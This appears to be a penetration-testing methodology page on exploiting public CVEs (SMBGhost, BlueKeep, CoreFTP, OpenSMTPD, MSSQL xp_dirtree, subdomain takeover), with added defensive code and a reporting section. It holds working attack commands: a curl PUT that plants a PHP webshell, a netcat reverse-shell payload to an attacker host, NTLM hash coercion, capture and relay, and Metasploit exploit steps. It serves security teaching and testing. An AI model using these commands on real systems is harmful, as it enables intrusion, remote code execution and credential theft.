## Methodology Checklist

- SMBGhost (CVE-2020-0796): `nmap --script smb-vuln-cve2020-0796 -p 445 [TARGET]`
- BlueKeep (CVE-2019-0708): MSF `auxiliary/scanner/rdp/cve_2019_0708_bluekeep`
- OpenSMTPD (CVE-2020-7247): sender field injection for RCE
- CoreFTP (CVE-2022-22836): PUT via `--path-as-is` to write outside the webroot
- Verify each CVE's applicability against the exact software version
- Capture NTLM hashes via xp_dirtree on MSSQL + Responder
- Run a subdomain takeover check with subjack after DNS enumeration
## Operational Context

Use when: a service version has been identified. Cross-reference it against known CVEs before attempting manual exploitation.

Think Dumber First: `searchsploit [service] [version]` takes 3 seconds. Then run `nmap --script vuln [TARGET]` for automated CVE checks. Check ExploitDB and NVD for CVEs from the last 3 years; older vulns are often patched, but not always.

Skip when: the service is up-to-date per the vendor advisory. Skip CVE hunting and focus on misconfiguration and credentials.
## Tactical Cheatsheet

| Command | Tactical Outcome |
|---|---|
| `nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP]` | Check SMBGhost (CVE-2020-0796): Win10 1903/1909 unauthenticated RCE |
| `nmap -p 3389 --script rdp-vuln-ms12-020 [TARGET_IP]` | Check BlueKeep indicator (CVE-2019-0708) on RDP |
| `nmap -p 3389 --script rdp-enum-encryption [TARGET_IP]` | Enumerate RDP encryption level |
| `curl -k -X PUT -H "Host: [TARGET_IP]" --basic -u [USER]:[PASS] --path-as-is https://[TARGET_IP]:443/../path/shell.php -d '<?php system($_GET["cmd"]); ?>'` | CoreFTP CVE-2022-22836: directory traversal file write via HTTP PUT |
| `nmap -p 445 --script smb-vuln-ms17-010 [TARGET_IP]` | EternalBlue (MS17-010) check via nmap |
| `nxc smb [DC_IP] -M zerologon` | ZeroLogon (CVE-2020-1472) check |
| `nxc smb [DC_IP] -M petitpotam` | PetitPotam NTLM relay coercion check |
| `nxc smb [DC_IP] -u [USER] -p [PASS] -M nopac` | noPAC (CVE-2021-42278/42287) check |
| `host [SUBDOMAIN].[DOMAIN]` | Subdomain takeover check: look for an NXDOMAIN/404 CNAME target |
| `dig [SUBDOMAIN].[DOMAIN] CNAME` | Resolve CNAME to find dangling DNS records |
| `nc -nv [TARGET_IP] 25; MAIL FROM:<;[CMD];>` | OpenSMTPD CVE-2020-7247 concept (unauthenticated RCE in sender field) |
| `EXEC master..xp_dirtree '\\[LHOST]\share\';` | MSSQL xp_dirtree: force NTLM hash capture without auth bypass |
## Deep Dive & Workflow

### SMBGhost (CVE-2020-0796): SMBv3.1.1 Compression RCE

```bash
# Check via nmap
sudo nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP]
# Affected: Windows 10 1903 and 1909 ONLY
# Pre-auth unauthenticated RCE via integer overflow in the SMB compression handler
# Exploits land as SYSTEM (driver context)
# WARNING: Unstable; may BSOD the target
# Verify OS version first:
nxc smb [TARGET_IP]   # -> shows OS version in output
# Mitigation check: is KB4551762 installed?
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "wmic qfe list | findstr KB4551762"
```
### BlueKeep (CVE-2019-0708): Pre-Auth RDP RCE

```bash
# Check via nmap
sudo nmap -p 3389 --script rdp-enum-encryption [TARGET_IP]
# BlueKeep affects: Windows XP/7/Server 2003/2008; NOT Windows 8/10/Server 2012+
```

```text
# Check via Metasploit (safe auxiliary module)
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS [TARGET_IP]
run
# Exploit (UNSTABLE; test in lab only):
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# WARNING: Frequently causes BSOD. Always get written authorization before running.
```
### CoreFTP (CVE-2022-22836): Authenticated Directory Traversal + File Write

```bash
# Prerequisite: valid FTP credentials
# Write webshell via HTTP PUT traversal
curl -k -X PUT -H "Host: [TARGET_IP]" \
  --basic -u [USER]:[PASS] \
  --path-as-is \
  "https://[TARGET_IP]:443/../../xampp/htdocs/shell.php" \
  -d '<?php system($_GET["cmd"]); ?>'
# --path-as-is is CRITICAL: without it, curl resolves ../ locally and strips the traversal
# Verify write:
curl -k "https://[TARGET_IP]/shell.php?cmd=whoami"
```
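An added example, not CoreFTP's code or the page's: the server-side counterpart to `--path-as-is`. Without that flag curl normalises `../` on the client, so a server that relies on clients behaving is exposed; the handler below percent-decodes the PUT target, refuses any `..` segment, and confirms the result stays under an assumed webroot of `/srv/www/htdocs`.

```python
import posixpath
from urllib.parse import unquote

WEBROOT = "/srv/www/htdocs"  # assumed webroot for this example


def resolve_put_target(request_path, webroot=WEBROOT):
    """Return the filesystem path a PUT may write to, or None to refuse.

    Mitigation for the bug class behind CVE-2022-22836: the raw request
    path is percent-decoded once, backslashes are treated as separators
    (Windows hosts), and any ".." segment is refused outright rather than
    silently clamped.  As a last line of defence the normalised result
    must still sit under the webroot.
    """
    decoded = unquote(request_path).replace("\\", "/")
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if ".." in segments:
        return None  # traversal attempt: refuse and log the raw request
    full = posixpath.normpath(posixpath.join(webroot, *segments))
    root = webroot.rstrip("/")
    if full != root and not full.startswith(root + "/"):
        return None  # should be unreachable; kept as defence in depth
    return full
```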
### MSSQL xp_dirtree: NTLM Hash Capture

```bash
# Requires: MSSQL access (any privilege level)
# Effect: the MSSQL server authenticates to the attacker's SMB share; the NTLMv2 hash is captured
# Start Responder first
sudo responder -I [IFACE]
```

```sql
-- Execute via MSSQL (impacket or GUI client)
EXEC master..xp_dirtree '\\[LHOST]\share\';
-- or
EXEC master..xp_cmdshell 'dir \\[LHOST]\share\';
```

```bash
# Crack the captured hash
hashcat -a 0 -m 5600 ntlmv2.hash rockyou.txt
# Alternative: SMB relay if SMB signing is disabled
impacket-ntlmrelayx -t [TARGET_IP] -smb2support
```
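An added detection example, not from the page: the coercion above shows up as the database engine itself opening an outbound SMB session. The Python below runs that logic over constructed Sysmon Event ID 3 records (field names follow Sysmon's schema; hosts, paths and the allowlist are invented) and flags `sqlservr.exe` connecting on 445/139 to anything outside an approved file-server list.

```python
import re

# Hosts the SQL server is expected to reach over SMB (assumed allowlist).
APPROVED_SMB_PEERS = {"10.0.0.20"}

# Constructed Sysmon Event ID 3 (NetworkConnect) records, one per line,
# flattened to key=value pairs.  Field names follow Sysmon's schema; the
# hosts, paths and addresses are invented for this example.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_EVENTS = "\n".join([
    f"EventID=3 Image={SQLSERVR} DestinationIp=10.0.0.20 DestinationPort=445 Initiated=true",
    f"EventID=3 Image={SQLSERVR} DestinationIp=10.0.0.99 DestinationPort=445 Initiated=true",
    r"EventID=3 Image=C:\Windows\explorer.exe DestinationIp=10.0.0.99 DestinationPort=445 Initiated=true",
    f"EventID=3 Image={SQLSERVR} DestinationIp=10.0.0.99 DestinationPort=1433 Initiated=true",
    f"EventID=3 Image={SQLSERVR} DestinationIp=10.0.0.99 DestinationPort=445 Initiated=false",
])

FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")


def parse_event(line):
    """Split a flattened Sysmon record into a dict; values may contain spaces."""
    return dict(FIELD_RE.findall(line))


def detect_smb_coercion(log_text, approved=APPROVED_SMB_PEERS):
    """Return the peers sqlservr.exe connected to over SMB outside the allowlist.

    xp_dirtree / xp_cmdshell with a UNC path makes the database engine itself
    open an outbound SMB session and authenticate with its service account,
    so an SMB connection *initiated by* sqlservr.exe to an unexpected host is
    the signal.  Inbound SMB and the normal TDS port 1433 are ignored.
    """
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "3" or ev.get("Initiated") != "true":
            continue
        if not ev.get("Image", "").lower().endswith("\\sqlservr.exe"):
            continue
        if ev.get("DestinationPort") not in ("445", "139"):
            continue
        if ev["DestinationIp"] not in approved:
            hits.append(ev["DestinationIp"])
    return hits
```

Pair this with SQL Server auditing of `xp_dirtree`/`xp_cmdshell` execution so the alert carries the login that issued the query.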
### OpenSMTPD (CVE-2020-7247): Unauthenticated RCE via Sender Field

```bash
# Affected: OpenSMTPD < 6.6.2 (Linux/BSD)
# RCE as root: the mail service runs privileged
# Identify via banner
nc -nv [TARGET_IP] 25
# -> 220 OpenSMTPD ESMTP
# Version check
nmap -p 25 --script smtp-commands [TARGET_IP]
# ExploitDB has a Python PoC:
searchsploit "OpenSMTPD"
# -> 47984 = Python exploit for CVE-2020-7247
# Length constraint: command must be <= 64 chars
# Common payload: nc [LHOST] [LPORT] -e /bin/sh
```
### Subdomain Takeover: Dangling CNAME

```bash
# Find a dangling CNAME (NXDOMAIN on the CNAME target = vulnerable)
host sub.target.com
# -> sub.target.com is an alias for something.s3.amazonaws.com
dig sub.target.com CNAME
# Check whether the third-party resource exists
curl -s "https://something.s3.amazonaws.com/"
# -> 404 NoSuchBucket = VULNERABLE: the bucket was deleted but DNS still points here
# Exploitation: register the resource at the third party
# -> Create an S3 bucket named "something" and serve your content
# -> Users visiting sub.target.com see attacker-controlled content on the official domain
# -> Enables: phishing, cookie theft (same domain), CSP bypass, CSRF
# Automated scanning:
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl
```
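An added example (not from the page or from subjack) that turns the manual `host`/`dig`/`curl` checks above into logic a domain owner can run over their own zone: it parses default-format dig output for the CNAME chain, then applies the NXDOMAIN rule and the S3 `NoSuchBucket` fingerprint. The dig text, names and addresses are constructed; only the S3 marker comes from the page.

```python
import re

# Constructed dig output (default format, trimmed) for two subdomains of the
# page's target.com; names and addresses are invented for this example.
DANGLING = (  # CNAME target no longer exists at all
    ";; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1234\n"
    ";; ANSWER SECTION:\n"
    "sub.target.com.\t\t300\tIN\tCNAME\tsomething.s3.amazonaws.com.\n"
)
UNCLAIMED = (  # the page's S3 case: endpoint resolves, bucket is gone
    ";; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9012\n"
    ";; ANSWER SECTION:\n"
    "files.target.com.\t300\tIN\tCNAME\tsomething.s3.amazonaws.com.\n"
    "something.s3.amazonaws.com.\t5\tIN\tA\t203.0.113.20\n"
)
UNCLAIMED_MARKERS = {"s3.amazonaws.com": "NoSuchBucket"}  # S3 marker from the page
RR_RE = re.compile(r"^(\S+)\s+\d+\s+IN\s+(CNAME|A|AAAA)\s+(\S+)$", re.M)

def parse_dig(output):
    """Return (status, [(owner, rtype, rdata)]) from default-format dig output."""
    m = re.search(r"status: (\w+)", output)
    rrs = [(o.rstrip("."), t, r.rstrip(".")) for o, t, r in RR_RE.findall(output)]
    return (m.group(1) if m else "UNKNOWN"), rrs

def follow_chain(name, rrs):  # -> (last name reached, whether it had an A/AAAA)
    cur, seen = name.rstrip("."), set()
    while cur not in seen:  # guards against CNAME loops
        seen.add(cur)
        hop = [rr for rr in rrs if rr[0] == cur]
        if any(t in ("A", "AAAA") for _, t, _ in hop):
            return cur, True
        nxt = [r for _, t, r in hop if t == "CNAME"]
        if not nxt:
            return cur, False
        cur = nxt[0]
    return cur, False

def classify(name, dig_output, http_body=""):
    """Label a subdomain: ok, no-cname, dangling-nxdomain, unresolved or dangling-unclaimed."""
    status, rrs = parse_dig(dig_output)
    target, has_addr = follow_chain(name, rrs)
    if target == name.rstrip("."):
        return "no-cname"
    if not has_addr:  # nothing answers for the chain's end
        return ("dangling-nxdomain:" if status == "NXDOMAIN" else "unresolved:") + target
    for suffix, marker in UNCLAIMED_MARKERS.items():
        if target.endswith(suffix) and marker in http_body:
            return "dangling-unclaimed:" + target  # provider says the resource is gone
    return "ok"
```

Feed it the real `dig` output and the body from fetching the CNAME target; `unresolved` results need a manual look rather than an automatic verdict.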
## Troubleshooting & Edge Cases

| Problem | Cause | Fix |
|---|---|---|
| searchsploit returns no results | Version format wrong | Try `searchsploit apache 2.4` rather than the full version; also search just the product name |
| Nmap vuln scripts very slow | Large target or many ports | Run targeted: `nmap -p 80,443 --script "http-vuln*" [TARGET]` for web only |
| CVE PoC found but doesn't work | Different patch level or environment | Check PoC requirements carefully; many PoCs require a specific sub-version or build |
| Metasploit module exists but fails | Auth required or patched | Verify: run `check` in MSF before `exploit`; the module may report vulnerable even if patched |
| NVD shows CVE but no public exploit | 0-day or unexploited | Check: exploit-db.com, github.com/search?q=[CVE], packetstormsecurity.com |
## Reporting Trigger

- Finding Title: Vulnerable Service Version Identified; Public Exploit Available
- Impact: Running a service version with a known public exploit gives attackers a reliable exploitation path requiring no novel vulnerability research, reducing time-to-compromise to minutes.
- Root Cause: The patch management process failed to apply available security updates. Vulnerability scanning is not integrated into the patching workflow.
- Recommendation: Implement continuous vulnerability scanning with automatic patch prioritization. Establish an SLA for critical CVE remediation (patch within 24-48 hours). Enable automatic security updates for the OS and major services where operationally feasible.